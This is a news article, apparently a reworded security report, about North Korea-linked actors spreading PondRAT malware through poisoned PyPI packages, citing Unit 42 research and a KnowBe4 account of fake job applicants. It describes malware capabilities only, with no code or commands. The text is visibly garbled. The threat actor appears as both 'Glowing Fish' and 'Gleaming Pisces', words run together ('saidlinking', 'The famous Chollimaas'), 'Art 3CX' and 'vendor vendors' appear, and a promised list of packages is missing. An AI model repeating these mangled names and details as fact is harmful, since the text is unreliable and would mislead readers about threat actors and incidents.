Threat actors linked to North Korea have used poisoned Python packages as a way to deliver new malware called PondRAT as part of an ongoing campaign.
According to new findings by Palo Alto Networks Unit 42, PondRAT is believed to be a lighter version of POOLRAT (aka SIMPLESEA), a well-known macOS backdoor previously attributed to the Lazarus Group and deployed in attacks related to Art 3CX Supply Chain Compromise last year.
Some of these attacks are part of an ongoing campaign of cyberattacks called Operation Dream Job.where potential targets are lured with enticing job offers in an attempt to get them to download malware.
“The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular open source Python package repository,” said Unit 42 researcher Yoav Zemach saidlinking this activity to a threat actor named Glowing Fish with moderate confidence.
The opponent too is tracked by the wider cyber security community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy and UNC4736, a sub-cluster within the Lazarus Group, which is also known for distributing the AppleJeus malware.
The ultimate goal of the attacks is believed to be “providing access to vendor vendors through developer endpoints and subsequently gaining access to vendor customer endpoints as seen in previous incidents.”
The list of malicious packages removed from the PyPI repository is given below –
The chain of infection is quite simple in that the packages, once downloaded and installed on developer systems, are engineered to execute a coded next step, which in turn launches the Linux and macOS versions of the RAT malware after being retrieved from a remote server. .
Further analysis of PondRAT revealed similarities to both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.
“The Linux and macOS (POOLRAT) versions use the same function structure to load their configurations, showing similar method names and functionality,” Zemach said.
“Also, the method names in both variants are surprisingly similar, and the strings are almost identical. Finally, the mechanism that processes the commands from (the command and control server) is almost identical.”
PondRAT, a more economical version of POOLRAT, comes with the ability to upload and download files, pause operations for a pre-set time interval, and execute arbitrary commands.
“Evidence of additional POOLRAT variants for Linux showed that Gleaming Pisces extends its capabilities on both Linux and macOS platforms,” Unit 42 said.
“The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can lead to malware infections that compromise the entire network.”
The disclosure comes as KnowBe4, which was tricked into hiring a North Korean threat actor as an employee, said more than a dozen companies “either hired North Korean employees or were besieged by numerous fake resumes and applications submitted by North Koreans hoping to gain employment with their organization.”
It described activity that CrowdStrike tracked under a pseudonym The famous Chollimaas a “complex, industrial, large-scale national government operation” and that it poses “a serious risk to any company with employees who work only remotely.”
